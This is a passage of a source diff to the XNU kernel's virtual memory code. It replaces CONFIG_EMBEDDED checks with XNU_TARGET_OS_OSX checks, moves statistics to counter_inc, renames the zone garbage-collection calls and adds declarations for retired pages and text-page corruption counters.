*/ -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX unsigned int preheat_max_bytes = (1024 * 512); -#else /* CONFIG_EMBEDDED */ +#else /* !XNU_TARGET_OS_OSX */ unsigned int preheat_max_bytes = MAX_UPL_TRANSFER_BYTES; -#endif /* CONFIG_EMBEDDED */ +#endif /* !XNU_TARGET_OS_OSX */ unsigned int preheat_min_bytes = (1024 * 32); @@ -6821,7 +6697,7 @@ vm_object_cluster_size(vm_object_t object, vm_object_offset_t *start, min_ph_size = round_page(preheat_min_bytes); max_ph_size = round_page(preheat_max_bytes); -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX if (isSSD) { min_ph_size /= 2; max_ph_size /= 8; @@ -6834,7 +6710,7 @@ vm_object_cluster_size(vm_object_t object, vm_object_offset_t *start, max_ph_size = trunc_page(max_ph_size); } } -#endif /* !CONFIG_EMBEDDED */ +#endif /* XNU_TARGET_OS_OSX */ if (min_ph_size < PAGE_SIZE) { min_ph_size = PAGE_SIZE; @@ -8779,9 +8655,7 @@ again: vm_object_unlock(object); } - if (__improbable(task->task_volatile_objects != 0 || - task->task_nonvolatile_objects != 0 || - task->task_owned_objects != 0)) { + if (__improbable(task->task_owned_objects != 0)) { panic("%s(%p): volatile=%d nonvolatile=%d owned=%d q=%p q_first=%p q_last=%p", __FUNCTION__, task, diff --git a/osfmk/vm/vm_object.h b/osfmk/vm/vm_object.h index 6399f95d0..f05742914 100644 --- a/osfmk/vm/vm_object.h +++ b/osfmk/vm/vm_object.h @@ -69,7 +69,6 @@ #include #include #include -#include #include #include @@ -429,6 +428,9 @@ vm_object_t kernel_object; /* the single kernel object */ extern vm_object_t compressor_object; /* the single compressor object */ +extern +vm_object_t retired_pages_object; /* holds VM pages which should never be used */ + extern unsigned int vm_object_absent_max; /* maximum number of absent pages * at a time for each object */ @@ -604,24 +606,6 @@ __private_extern__ vm_object_t vm_object_allocate(vm_object_size_t size); __private_extern__ void _vm_object_allocate(vm_object_size_t size, vm_object_t object); -#if TASK_SWAPPER - -__private_extern__ void 
vm_object_res_reference( - vm_object_t object); -__private_extern__ void vm_object_res_deallocate( - vm_object_t object); -#define VM_OBJ_RES_INCR(object) (object)->res_count++ -#define VM_OBJ_RES_DECR(object) (object)->res_count-- - -#else /* TASK_SWAPPER */ - -#define VM_OBJ_RES_INCR(object) -#define VM_OBJ_RES_DECR(object) -#define vm_object_res_reference(object) -#define vm_object_res_deallocate(object) - -#endif /* TASK_SWAPPER */ - #define vm_object_reference_locked(object) \ MACRO_BEGIN \ vm_object_t RLObject = (object); \ @@ -629,19 +613,16 @@ __private_extern__ void vm_object_res_deallocate( assert((RLObject)->ref_count > 0); \ (RLObject)->ref_count++; \ assert((RLObject)->ref_count > 1); \ - vm_object_res_reference(RLObject); \ MACRO_END -#define vm_object_reference_shared(object) \ - MACRO_BEGIN \ - vm_object_t RLObject = (object); \ - vm_object_lock_assert_shared(object); \ - assert((RLObject)->ref_count > 0); \ +#define vm_object_reference_shared(object) \ + MACRO_BEGIN \ + vm_object_t RLObject = (object); \ + vm_object_lock_assert_shared(object); \ + assert((RLObject)->ref_count > 0); \ OSAddAtomic(1, &(RLObject)->ref_count); \ - assert((RLObject)->ref_count > 0); \ - /* XXX we would need an atomic version of the following ... 
*/ \ - vm_object_res_reference(RLObject); \ + assert((RLObject)->ref_count > 0); \ MACRO_END diff --git a/osfmk/vm/vm_page.h b/osfmk/vm/vm_page.h index 164a36145..d4542fd10 100644 --- a/osfmk/vm/vm_page.h +++ b/osfmk/vm/vm_page.h @@ -1423,6 +1423,9 @@ extern void vm_page_create( ppnum_t start, ppnum_t end); +extern void vm_page_create_retired( + ppnum_t pn); + extern vm_page_t kdp_vm_page_lookup( vm_object_t object, vm_object_offset_t offset); @@ -1431,18 +1434,16 @@ extern vm_page_t vm_page_lookup( vm_object_t object, vm_object_offset_t offset); -extern vm_page_t vm_page_grab_fictitious(void); +extern vm_page_t vm_page_grab_fictitious(boolean_t canwait); -extern vm_page_t vm_page_grab_guard(void); +extern vm_page_t vm_page_grab_guard(boolean_t canwait); extern void vm_page_release_fictitious( vm_page_t page); extern void vm_free_delayed_pages(void); -extern void vm_page_more_fictitious(void); - -extern int vm_pool_low(void); +extern bool vm_pool_low(void); extern vm_page_t vm_page_grab(void); extern vm_page_t vm_page_grab_options(int flags); @@ -1466,10 +1467,6 @@ extern vm_page_t vm_page_alloc( vm_object_t object, vm_object_offset_t offset); -extern vm_page_t vm_page_alloc_guard( - vm_object_t object, - vm_object_offset_t offset); - extern void vm_page_init( vm_page_t page, ppnum_t phys_page, @@ -1630,15 +1627,15 @@ extern void memorystatus_pages_update(unsigned int pages_avail); #else /* CONFIG_JETSAM */ -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #define VM_CHECK_MEMORYSTATUS do {} while(0) -#else /* CONFIG_EMBEDDED */ +#else /* !XNU_TARGET_OS_OSX */ #define VM_CHECK_MEMORYSTATUS vm_pressure_response() -#endif /* CONFIG_EMBEDDED */ +#endif /* !XNU_TARGET_OS_OSX */ #endif /* CONFIG_JETSAM */ @@ -1647,7 +1644,7 @@ extern void memorystatus_pages_update(unsigned int pages_avail); * protected by the object lock. 
*/ -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #define SET_PAGE_DIRTY(m, set_pmap_modified) \ MACRO_BEGIN \ vm_page_t __page__ = (m); \ @@ -1659,13 +1656,13 @@ extern void memorystatus_pages_update(unsigned int pages_avail); } \ __page__->vmp_dirty = TRUE; \ MACRO_END -#else /* CONFIG_EMBEDDED */ +#else /* !XNU_TARGET_OS_OSX */ #define SET_PAGE_DIRTY(m, set_pmap_modified) \ MACRO_BEGIN \ vm_page_t __page__ = (m); \ __page__->vmp_dirty = TRUE; \ MACRO_END -#endif /* CONFIG_EMBEDDED */ +#endif /* !XNU_TARGET_OS_OSX */ #define PAGE_ASSERT_WAIT(m, interruptible) \ (((m)->vmp_wanted = TRUE), \ @@ -1702,12 +1699,6 @@ extern void memorystatus_pages_update(unsigned int pages_avail); vm_page_free_unlocked(p, TRUE); \ MACRO_END -#define VM_PAGE_GRAB_FICTITIOUS(M) \ - MACRO_BEGIN \ - while ((M = vm_page_grab_fictitious()) == VM_PAGE_NULL) \ - vm_page_more_fictitious(); \ - MACRO_END - #define VM_PAGE_WAIT() ((void)vm_page_wait(THREAD_UNINT)) #define vm_page_queue_lock (vm_page_locks.vm_page_queue_lock2) @@ -1860,5 +1851,7 @@ extern void start_secluded_suppression(task_t); extern void stop_secluded_suppression(task_t); #endif /* CONFIG_SECLUDED_MEMORY */ +extern void vm_retire_boot_pages(void); +extern uint32_t vm_retired_pages_count(void); #endif /* _VM_VM_PAGE_H_ */ diff --git a/osfmk/vm/vm_pageout.c b/osfmk/vm/vm_pageout.c index 63dd004ea..416921ce3 100644 --- a/osfmk/vm/vm_pageout.c +++ b/osfmk/vm/vm_pageout.c @@ -82,7 +82,7 @@ #include #include -#include +#include #include #include #include @@ -151,11 +151,11 @@ thread_t vm_pageout_scan_thread = THREAD_NULL; boolean_t vps_dynamic_priority_enabled = FALSE; #ifndef VM_PAGEOUT_BURST_INACTIVE_THROTTLE /* maximum iterations of the inactive queue w/o stealing/cleaning a page */ -#ifdef CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #define VM_PAGEOUT_BURST_INACTIVE_THROTTLE 1024 -#else +#else /* !XNU_TARGET_OS_OSX */ #define VM_PAGEOUT_BURST_INACTIVE_THROTTLE 4096 -#endif +#endif /* !XNU_TARGET_OS_OSX */ #endif #ifndef 
VM_PAGEOUT_DEADLOCK_RELIEF @@ -214,11 +214,11 @@ boolean_t vps_dynamic_priority_enabled = FALSE; */ #ifndef VM_PAGE_FREE_TARGET -#ifdef CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #define VM_PAGE_FREE_TARGET(free) (15 + (free) / 100) -#else +#else /* !XNU_TARGET_OS_OSX */ #define VM_PAGE_FREE_TARGET(free) (15 + (free) / 80) -#endif +#endif /* !XNU_TARGET_OS_OSX */ #endif /* VM_PAGE_FREE_TARGET */ @@ -228,22 +228,22 @@ boolean_t vps_dynamic_priority_enabled = FALSE; */ #ifndef VM_PAGE_FREE_MIN -#ifdef CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #define VM_PAGE_FREE_MIN(free) (10 + (free) / 200) -#else +#else /* !XNU_TARGET_OS_OSX */ #define VM_PAGE_FREE_MIN(free) (10 + (free) / 100) -#endif +#endif /* !XNU_TARGET_OS_OSX */ #endif /* VM_PAGE_FREE_MIN */ -#ifdef CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #define VM_PAGE_FREE_RESERVED_LIMIT 100 #define VM_PAGE_FREE_MIN_LIMIT 1500 #define VM_PAGE_FREE_TARGET_LIMIT 2000 -#else +#else /* !XNU_TARGET_OS_OSX */ #define VM_PAGE_FREE_RESERVED_LIMIT 1700 #define VM_PAGE_FREE_MIN_LIMIT 3500 #define VM_PAGE_FREE_TARGET_LIMIT 4000 -#endif +#endif /* !XNU_TARGET_OS_OSX */ /* * When vm_page_free_count falls below vm_page_free_reserved, @@ -269,11 +269,11 @@ boolean_t vps_dynamic_priority_enabled = FALSE; #define VM_PAGE_REACTIVATE_LIMIT_MAX 20000 #ifndef VM_PAGE_REACTIVATE_LIMIT -#ifdef CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #define VM_PAGE_REACTIVATE_LIMIT(avail) (VM_PAGE_INACTIVE_TARGET(avail) / 2) -#else +#else /* !XNU_TARGET_OS_OSX */ #define VM_PAGE_REACTIVATE_LIMIT(avail) (MAX((avail) * 1 / 20,VM_PAGE_REACTIVATE_LIMIT_MAX)) -#endif +#endif /* !XNU_TARGET_OS_OSX */ #endif /* VM_PAGE_REACTIVATE_LIMIT */ #define VM_PAGEOUT_INACTIVE_FORCE_RECLAIM 1000 @@ -315,9 +315,9 @@ boolean_t vm_pageout_running = FALSE; uint32_t vm_page_upl_tainted = 0; uint32_t vm_page_iopl_tainted = 0; -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX static boolean_t vm_pageout_waiter = FALSE; -#endif /* !CONFIG_EMBEDDED */ +#endif /* XNU_TARGET_OS_OSX */ #if 
DEVELOPMENT || DEBUG @@ -446,7 +446,7 @@ vm_pageout_object_terminate( if (m->vmp_dirty) { vm_page_unwire(m, TRUE); /* reactivates */ - VM_STAT_INCR(reactivations); + counter_inc(&vm_statistics_reactivations); PAGE_WAKEUP_DONE(m); } else { vm_page_free(m); /* clears busy, etc. */ @@ -1587,7 +1587,7 @@ update_vm_info(void) vm_pageout_stats[vm_pageout_stat_now].phantom_ghosts_added = (unsigned int)(tmp - last.vm_phantom_cache_added_ghost); last.vm_phantom_cache_added_ghost = tmp; - tmp64 = get_pages_grabbed_count(); + tmp64 = counter_load(&vm_page_grab_count); vm_pageout_stats[vm_pageout_stat_now].pages_grabbed = (unsigned int)(tmp64 - last_vm_page_pages_grabbed); last_vm_page_pages_grabbed = tmp64; @@ -2299,8 +2299,6 @@ vps_flow_control(struct flow_control *flow_control, int *anons_grabbed, vm_objec iq->pgo_throttled = TRUE; assert_wait_timeout((event_t) &iq->pgo_laundry, THREAD_INTERRUPTIBLE, msecs, 1000 * NSEC_PER_USEC); - counter(c_vm_pageout_scan_block++); - vm_page_unlock_queues(); assert(vm_pageout_scan_wants_object == VM_OBJECT_NULL); @@ -2478,7 +2476,7 @@ want_anonymous: vm_pageout_vminfo.vm_pageout_filecache_min_reactivated++; vm_page_activate(m); - VM_STAT_INCR(reactivations); + counter_inc(&vm_statistics_reactivations); #if CONFIG_BACKGROUND_QUEUE #if DEVELOPMENT || DEBUG if (*is_page_from_bg_q == TRUE) { @@ -2748,7 +2746,7 @@ vps_deal_with_throttled_queues(vm_page_t m, vm_object_t *object, uint32_t *vm_pa #endif /* CONFIG_MEMORYSTATUS && CONFIG_JETSAM */ } else { vm_page_activate(m); - VM_STAT_INCR(reactivations); + counter_inc(&vm_statistics_reactivations); #if CONFIG_BACKGROUND_QUEUE #if DEVELOPMENT || DEBUG @@ -3418,7 +3416,7 @@ reactivate_page: * The page was/is being used, so put back on active list. 
*/ vm_page_activate(m); - VM_STAT_INCR(reactivations); + counter_inc(&vm_statistics_reactivations); inactive_burst_count = 0; } #if CONFIG_BACKGROUND_QUEUE @@ -3727,22 +3725,21 @@ vm_pageout_continue(void) assert_wait((event_t) &vm_page_free_wanted, THREAD_UNINT); vm_pageout_running = FALSE; -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX if (vm_pageout_waiter) { vm_pageout_waiter = FALSE; thread_wakeup((event_t)&vm_pageout_waiter); } -#endif /* !CONFIG_EMBEDDED */ +#endif /* XNU_TARGET_OS_OSX */ lck_mtx_unlock(&vm_page_queue_free_lock); vm_page_unlock_queues(); - counter(c_vm_pageout_block++); thread_block((thread_continue_t)vm_pageout_continue); /*NOTREACHED*/ } -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX kern_return_t vm_pageout_wait(uint64_t deadline) { @@ -3761,7 +3758,7 @@ vm_pageout_wait(uint64_t deadline) return kr; } -#endif /* !CONFIG_EMBEDDED */ +#endif /* XNU_TARGET_OS_OSX */ static void @@ -4232,7 +4229,7 @@ vm_pageout_compress_page(void **current_chead, char *scratch_buf, vm_page_t m) vm_object_owner_compressed_update(object, +1); } - VM_STAT_INCR(compressions); + counter_inc(&vm_statistics_compressions); if (m->vmp_tabled) { vm_page_remove(m, TRUE); @@ -4380,16 +4377,16 @@ vm_pressure_response(void) return; } -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX available_memory = (uint64_t) memorystatus_available_pages; -#else /* CONFIG_EMBEDDED */ +#else /* !XNU_TARGET_OS_OSX */ available_memory = (uint64_t) AVAILABLE_NON_COMPRESSED_MEMORY; memorystatus_available_pages = (uint64_t) AVAILABLE_NON_COMPRESSED_MEMORY; -#endif /* CONFIG_EMBEDDED */ +#endif /* !XNU_TARGET_OS_OSX */ total_pages = (unsigned int) atop_64(max_mem); #if CONFIG_SECLUDED_MEMORY @@ -4582,7 +4579,7 @@ void vm_pageout_garbage_collect(int collect) { if (collect) { - if (is_zone_map_nearing_exhaustion()) { + if (zone_map_nearing_exhaustion()) { /* * Woken up by the zone allocator for zone-map-exhaustion jetsams. 
* @@ -4600,7 +4597,7 @@ vm_pageout_garbage_collect(int collect) * ok; if memory pressure persists, the thread will simply be woken * up again. */ - consider_zone_gc(TRUE); + zone_gc(ZONE_GC_JETSAM); } else { /* Woken up by vm_pageout_scan or compute_pageout_gc_throttle. */ boolean_t buf_large_zfree = FALSE; @@ -4617,10 +4614,10 @@ vm_pageout_garbage_collect(int collect) } if (first_try == TRUE || buf_large_zfree == TRUE) { /* - * consider_zone_gc should be last, because the other operations + * zone_gc should be last, because the other operations * might return memory to zones. */ - consider_zone_gc(FALSE); + zone_gc(ZONE_GC_TRIM); } first_try = FALSE; } while (buf_large_zfree == TRUE && vm_page_free_count < vm_page_free_target); @@ -4872,13 +4869,22 @@ vm_pageout(void) thread_set_thread_name(vm_pageout_state.vm_pageout_external_iothread, "VM_pageout_external_iothread"); thread_deallocate(vm_pageout_state.vm_pageout_external_iothread); - result = kernel_thread_start_priority((thread_continue_t)vm_pageout_garbage_collect, NULL, + result = kernel_thread_create((thread_continue_t)vm_pageout_garbage_collect, NULL, BASEPRI_DEFAULT, &thread); if (result != KERN_SUCCESS) { panic("vm_pageout_garbage_collect: create failed"); } thread_set_thread_name(thread, "VM_pageout_garbage_collect"); + if (thread->reserved_stack == 0) { + assert(thread->kernel_stack); + thread->reserved_stack = thread->kernel_stack; + } + + thread_mtx_lock(thread); + thread_start(thread); + thread_mtx_unlock(thread); + thread_deallocate(thread); #if VM_PRESSURE_EVENTS @@ -5010,15 +5016,15 @@ vm_pageout_internal_start(void) assert(hinfo.max_cpus > 0); -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX vm_pageout_state.vm_compressor_thread_count = 1; -#else +#else /* !XNU_TARGET_OS_OSX */ if (hinfo.max_cpus > 4) { vm_pageout_state.vm_compressor_thread_count = 2; } else { vm_pageout_state.vm_compressor_thread_count = 1; } -#endif +#endif /* !XNU_TARGET_OS_OSX */ PE_parse_boot_argn("vmcomp_threads", 
&vm_pageout_state.vm_compressor_thread_count, sizeof(vm_pageout_state.vm_compressor_thread_count)); @@ -5339,27 +5345,19 @@ must_throttle_writes() #define MAX_DELAYED_WORK_CTX_ALLOCATED (512) int vm_page_delayed_work_ctx_needed = 0; -zone_t dw_ctx_zone = ZONE_NULL; +SECURITY_READ_ONLY_LATE(zone_t) dw_ctx_zone; void vm_page_delayed_work_init_ctx(void) { - int nelems = 0, elem_size = 0; - - elem_size = sizeof(struct vm_page_delayed_work_ctx); + size_t elem_size = sizeof(struct vm_page_delayed_work_ctx); dw_ctx_zone = zone_create_ext("delayed-work-ctx", elem_size, ZC_NOGC, ZONE_ID_ANY, ^(zone_t z) { - zone_set_exhaustible(z, MAX_DELAYED_WORK_CTX_ALLOCATED * elem_size); + zone_set_exhaustible(z, MAX_DELAYED_WORK_CTX_ALLOCATED); }); - nelems = zfill(dw_ctx_zone, MIN_DELAYED_WORK_CTX_ALLOCATED); - if (nelems < MIN_DELAYED_WORK_CTX_ALLOCATED) { - printf("vm_page_delayed_work_init_ctx: Failed to preallocate minimum delayed work contexts (%d vs %d).\n", nelems, MIN_DELAYED_WORK_CTX_ALLOCATED); -#if DEVELOPMENT || DEBUG - panic("Failed to preallocate minimum delayed work contexts (%d vs %d).\n", nelems, MIN_DELAYED_WORK_CTX_ALLOCATED); -#endif /* DEVELOPMENT || DEBUG */ - } + zone_fill_initially(dw_ctx_zone, MIN_DELAYED_WORK_CTX_ALLOCATED); } struct vm_page_delayed_work* @@ -5578,7 +5576,7 @@ vm_object_upl_request( "object %p shadow_offset 0x%llx", upl->map_object, upl->map_object->vo_shadow_offset); - VM_PAGE_GRAB_FICTITIOUS(alias_page); + alias_page = vm_page_grab_fictitious(TRUE); upl->flags |= UPL_SHADOWED; } @@ -5648,11 +5646,11 @@ vm_object_upl_request( if ((cntrl_flags & UPL_WILL_MODIFY) && must_throttle_writes() == TRUE) { boolean_t isSSD = FALSE; -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX isSSD = TRUE; -#else +#else /* !XNU_TARGET_OS_OSX */ vnode_pager_get_isSSD(object->pager, &isSSD); -#endif +#endif /* !XNU_TARGET_OS_OSX */ vm_object_unlock(object); OSAddAtomic(size_in_pages, &vm_upl_wait_for_pages); @@ -5672,7 +5670,7 @@ vm_object_upl_request( if ((alias_page 
== NULL) && !(cntrl_flags & UPL_SET_LITE)) { vm_object_unlock(object); - VM_PAGE_GRAB_FICTITIOUS(alias_page); + alias_page = vm_page_grab_fictitious(TRUE); vm_object_lock(object); } if (cntrl_flags & UPL_COPYOUT_FROM) { @@ -6030,7 +6028,7 @@ check_busy: dst_page->vmp_clustered = TRUE; if (!(cntrl_flags & UPL_FILE_IO)) { - VM_STAT_INCR(pageins); + counter_inc(&vm_statistics_pageins); } } } @@ -6201,7 +6199,7 @@ check_busy: try_next_page: if (dwp->dw_mask) { if (dwp->dw_mask & DW_vm_page_activate) { - VM_STAT_INCR(reactivations); + counter_inc(&vm_statistics_reactivations); } VM_PAGE_ADD_DELAYED_WORK(dwp, dst_page, dw_count); @@ -6462,7 +6460,7 @@ REDISCOVER_ENTRY: goto done; } -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX if (map->pmap != kernel_pmap && (caller_flags & UPL_COPYOUT_FROM) && (entry->protection & VM_PROT_EXECUTE) && @@ -6531,7 +6529,7 @@ REDISCOVER_ENTRY: #endif /* DEVELOPMENT || DEBUG */ goto done; } -#endif /* CONFIG_EMBEDDED */ +#endif /* !XNU_TARGET_OS_OSX */ local_object = VME_OBJECT(entry); assert(local_object != VM_OBJECT_NULL); @@ -6637,24 +6635,6 @@ REDISCOVER_ENTRY: vm_map_t real_map; vm_prot_t fault_type; - if (entry->vme_start < VM_MAP_TRUNC_PAGE(offset, VM_MAP_PAGE_MASK(map)) || - entry->vme_end > VM_MAP_ROUND_PAGE(offset + *upl_size, VM_MAP_PAGE_MASK(map))) { - /* - * Clip the requested range first to minimize the - * amount of potential copying... 
- */ - if (vm_map_lock_read_to_write(map)) { - goto REDISCOVER_ENTRY; - } - vm_map_lock_assert_exclusive(map); - assert(VME_OBJECT(entry) == local_object); - vm_map_clip_start(map, entry, - VM_MAP_TRUNC_PAGE(offset, VM_MAP_PAGE_MASK(map))); - vm_map_clip_end(map, entry, - VM_MAP_ROUND_PAGE(offset + *upl_size, VM_MAP_PAGE_MASK(map))); - vm_map_lock_write_to_read(map); - } - local_map = map; if (caller_flags & UPL_COPYOUT_FROM) { @@ -7009,7 +6989,7 @@ process_upl_to_enter: assert(pg_num == new_offset / PAGE_SIZE); if (lite_list[pg_num >> 5] & (1U << (pg_num & 31))) { - VM_PAGE_GRAB_FICTITIOUS(alias_page); + alias_page = vm_page_grab_fictitious(TRUE); vm_object_lock(object); @@ -7739,7 +7719,7 @@ process_upl_to_commit: dwp->dw_mask |= DW_vm_page_activate | DW_PAGE_WAKEUP; if (upl->flags & UPL_PAGEOUT) { - VM_STAT_INCR(reactivations); + counter_inc(&vm_statistics_reactivations); DTRACE_VM2(pgrec, int, 1, (uint64_t *), NULL); } } else { @@ -7780,7 +7760,7 @@ process_upl_to_commit: if (hibernate_cleaning_in_progress == FALSE && !m->vmp_dirty && (upl->flags & UPL_PAGEOUT)) { pgpgout_count++; - VM_STAT_INCR(pageouts); + counter_inc(&vm_statistics_pageouts); DTRACE_VM2(pgout, int, 1, (uint64_t *), NULL); dwp->dw_mask |= DW_enqueue_cleaned; @@ -9672,7 +9652,7 @@ return_err: vm_page_unlock_queues(); if (need_unwire == TRUE) { - VM_STAT_INCR(reactivations); + counter_inc(&vm_statistics_reactivations); } } #if UPL_DEBUG diff --git a/osfmk/vm/vm_pageout.h b/osfmk/vm/vm_pageout.h index 980095f6f..94e667ca4 100644 --- a/osfmk/vm/vm_pageout.h +++ b/osfmk/vm/vm_pageout.h @@ -227,7 +227,11 @@ extern upl_size_t upl_get_size( extern upl_t upl_associated_upl(upl_t upl); extern void upl_set_associated_upl(upl_t upl, upl_t associated_upl); +#ifndef MACH_KERNEL_PRIVATE +typedef struct vm_page *vm_page_t; +#endif #ifdef XNU_KERNEL_PRIVATE +#include extern upl_size_t upl_adjusted_size( upl_t upl, @@ -252,22 +256,18 @@ extern void iopl_valid_data( upl_t upl_ptr, vm_tag_t tag); -#endif /* 
XNU_KERNEL_PRIVATE */ - -extern struct vnode * upl_lookup_vnode(upl_t upl); - -#ifndef MACH_KERNEL_PRIVATE -typedef struct vm_page *vm_page_t; -#endif - -extern void vm_page_free_list( +extern void vm_page_free_list( vm_page_t mem, boolean_t prepare_object); extern kern_return_t vm_page_alloc_list( int page_count, - int flags, - vm_page_t * list); + kma_flags_t flags, + vm_page_t *list); + +#endif /* XNU_KERNEL_PRIVATE */ + +extern struct vnode * upl_lookup_vnode(upl_t upl); extern void vm_page_set_offset(vm_page_t page, vm_object_offset_t offset); extern vm_object_offset_t vm_page_get_offset(vm_page_t page); @@ -276,9 +276,9 @@ extern vm_page_t vm_page_get_next(vm_page_t page); extern kern_return_t mach_vm_pressure_level_monitor(boolean_t wait_for_pressure, unsigned int *pressure_level); -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX extern kern_return_t vm_pageout_wait(uint64_t deadline); -#endif +#endif /* XNU_TARGET_OS_OSX */ #ifdef MACH_KERNEL_PRIVATE diff --git a/osfmk/vm/vm_phantom_cache.c b/osfmk/vm/vm_phantom_cache.c index 01e0711b3..c0a74a04f 100644 --- a/osfmk/vm/vm_phantom_cache.c +++ b/osfmk/vm/vm_phantom_cache.c @@ -36,21 +36,21 @@ uint32_t phantom_cache_eval_period_in_msecs = 250; uint32_t phantom_cache_thrashing_threshold_ssd = 1000; -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX uint32_t phantom_cache_thrashing_threshold = 500; -#else +#else /* !XNU_TARGET_OS_OSX */ uint32_t phantom_cache_thrashing_threshold = 50; -#endif +#endif /* !XNU_TARGET_OS_OSX */ /* * Number of consecutive thrashing periods required before * vm_phantom_cache_check_pressure() returns true. 
*/ -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX unsigned phantom_cache_contiguous_periods = 4; -#else +#else /* !XNU_TARGET_OS_OSX */ unsigned phantom_cache_contiguous_periods = 2; -#endif +#endif /* !XNU_TARGET_OS_OSX */ clock_sec_t pc_start_of_eval_period_sec = 0; clock_nsec_t pc_start_of_eval_period_nsec = 0; @@ -113,11 +113,11 @@ vm_phantom_cache_init() if (!VM_CONFIG_COMPRESSOR_IS_ACTIVE) { return; } -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX num_entries = (uint32_t)(((max_mem / PAGE_SIZE) / 10) / VM_GHOST_PAGES_PER_ENTRY); -#else +#else /* !XNU_TARGET_OS_OSX */ num_entries = (uint32_t)(((max_mem / PAGE_SIZE) / 4) / VM_GHOST_PAGES_PER_ENTRY); -#endif +#endif /* !XNU_TARGET_OS_OSX */ vm_phantom_cache_num_entries = 1; while (vm_phantom_cache_num_entries < num_entries) { diff --git a/osfmk/vm/vm_protos.h b/osfmk/vm/vm_protos.h index 50a654348..78b5a746d 100644 --- a/osfmk/vm/vm_protos.h +++ b/osfmk/vm/vm_protos.h @@ -71,8 +71,13 @@ extern boolean_t vm_swap_files_pinned(void); extern mach_port_name_t ipc_port_copyout_send( ipc_port_t sright, ipc_space_t space); +extern mach_port_name_t ipc_port_copyout_send_pinned( + ipc_port_t sright, + ipc_space_t space); extern task_t port_name_to_task( mach_port_name_t name); +extern task_t port_name_to_task_read( + mach_port_name_t name); extern task_t port_name_to_task_name( mach_port_name_t name); extern void ipc_port_release_send( @@ -96,6 +101,7 @@ extern void consider_machine_adjust(void); extern vm_map_offset_t get_map_min(vm_map_t); extern vm_map_offset_t get_map_max(vm_map_t); extern vm_map_size_t get_vmmap_size(vm_map_t); +extern int get_task_page_size(task_t); #if CONFIG_COREDUMP extern int get_vmmap_entries(vm_map_t); #endif @@ -178,7 +184,8 @@ extern memory_object_t apple_protect_pager_setup( vm_object_offset_t crypto_backing_offset, struct pager_crypt_info *crypt_info, vm_object_offset_t crypto_start, - vm_object_offset_t crypto_end); + vm_object_offset_t crypto_end, + boolean_t cache_pager); #endif /* 
CONFIG_CODE_DECRYPTION */ struct vm_shared_region_slide_info; @@ -590,6 +597,20 @@ extern unsigned int mach_vm_ctl_page_free_wanted(void); extern int no_paging_space_action(void); +/* + * counts updated by revalidate_text_page() + */ +extern unsigned int vmtc_total; /* total # of text page corruptions detected */ +extern unsigned int vmtc_undiagnosed; /* of that what wasn't diagnosed */ +extern unsigned int vmtc_not_eligible; /* failed to correct, due to page attributes */ +extern unsigned int vmtc_copyin_fail; /* of undiagnosed, copyin failure count */ +extern unsigned int vmtc_not_found; /* of diagnosed, no error found - code signing error? */ +extern unsigned int vmtc_one_bit_flip; /* of diagnosed, single bit errors */ +#define MAX_TRACK_POWER2 9 /* of diagnosed, counts of 1, 2, 4,... bytes corrupted */ +extern unsigned int vmtc_byte_counts[MAX_TRACK_POWER2 + 1]; + +extern kern_return_t revalidate_text_page(task_t, vm_map_offset_t); + #define VM_TOGGLE_CLEAR 0 #define VM_TOGGLE_SET 1 #define VM_TOGGLE_GETVALUE 999 diff --git a/osfmk/vm/vm_purgeable.c b/osfmk/vm/vm_purgeable.c index b44ec0cf8..08355b9e5 100644 --- a/osfmk/vm/vm_purgeable.c +++ b/osfmk/vm/vm_purgeable.c @@ -736,13 +736,13 @@ vm_purgeable_object_find_and_lock( */ owner = object->vo_owner; if (owner != NULL && owner != VM_OBJECT_OWNER_DISOWNED) { -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #if CONFIG_JETSAM object_task_importance = proc_get_memstat_priority((struct proc *)get_bsdtask_info(owner), TRUE); #endif /* CONFIG_JETSAM */ -#else /* CONFIG_EMBEDDED */ +#else /* !XNU_TARGET_OS_OSX */ object_task_importance = task_importance_estimate(owner); -#endif /* CONFIG_EMBEDDED */ +#endif /* !XNU_TARGET_OS_OSX */ } if (object_task_importance < best_object_task_importance) { diff --git a/osfmk/vm/vm_resident.c b/osfmk/vm/vm_resident.c index ca78ec877..0cb0914af 100644 --- a/osfmk/vm/vm_resident.c +++ b/osfmk/vm/vm_resident.c @@ -70,7 +70,7 @@ #include #include #include -#include +#include #include 
#include #include @@ -169,11 +169,13 @@ boolean_t hibernation_vmqueues_inspection = FALSE; /* Tracks if the hibern * Updated and checked behind the vm_page_queues_lock. */ static void vm_page_free_prepare(vm_page_t page); -static vm_page_t vm_page_grab_fictitious_common(ppnum_t phys_addr); +static vm_page_t vm_page_grab_fictitious_common(ppnum_t, boolean_t); static void vm_tag_init(void); /* for debugging purposes */ +SECURITY_READ_ONLY_EARLY(uint32_t) vm_packed_from_vm_pages_array_mask = + VM_PAGE_PACKED_FROM_ARRAY; SECURITY_READ_ONLY_EARLY(vm_packing_params_t) vm_page_packing_params = VM_PACKING_PARAMS(VM_PAGE_PACKED_PTR); @@ -211,12 +213,12 @@ typedef struct { #define BUCKETS_PER_LOCK 16 -vm_page_bucket_t *vm_page_buckets; /* Array of buckets */ -unsigned int vm_page_bucket_count = 0; /* How big is array? */ -unsigned int vm_page_hash_mask; /* Mask for hash function */ -unsigned int vm_page_hash_shift; /* Shift for hash function */ -uint32_t vm_page_bucket_hash; /* Basic bucket hash */ -unsigned int 